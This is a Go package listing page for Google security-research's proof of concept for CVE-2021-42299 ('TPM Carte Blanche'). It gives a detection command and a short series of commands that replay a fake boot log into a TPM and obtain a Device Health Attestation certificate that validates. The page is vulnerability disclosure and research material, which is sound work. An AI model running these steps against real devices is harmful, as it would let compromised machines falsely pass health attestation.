tpm-carte-blanche

module

v0.0.0-...-839fa04 Latest Latest Go to latest Published: May 16, 2024 License: Apache-2.0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/google/security-research

Links

Open Source Insights

README ¶

CVE-2021-42299: TPM Carte Blanche

This Proof-Of-Concept demonstrates the exploitation of CVE-2021-42299.

Technical details

Technical details about the exploit is available at writeup.md.

Detection

sudo bugtool

Exploit proof-of-concept

# Extend the fake log
sudo dhatool --log=path/to/log/file --bank=sha256 replay
# Self test
sudo attest-tool --log=path/to/log/file self-test
# Get AIK cert
sudo akcli
# Fetch a health cert
sudo dhatool --log=path/to/log/file --bank=sha256 --aik=path/to/aik getcert
# Validate the health cert against DHA with the current time as a nonce
NONCE=$(echo "obase=16; $(date +%s%N)" | bc); echo ${NONCE}
# normally the MDM generates a nonce, asks the device for claims and then validates against DHA
sudo dhatool --cert=path/to/healthcert --bank=sha256 --aik=path/to/aik --nonce=$NONCE validate

Credits

Chris Fenner (cfenn@)

Directories ¶

Path	Synopsis
cmd
akcli
aksrv
bugtool
dhatool
lib
akscep
open

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL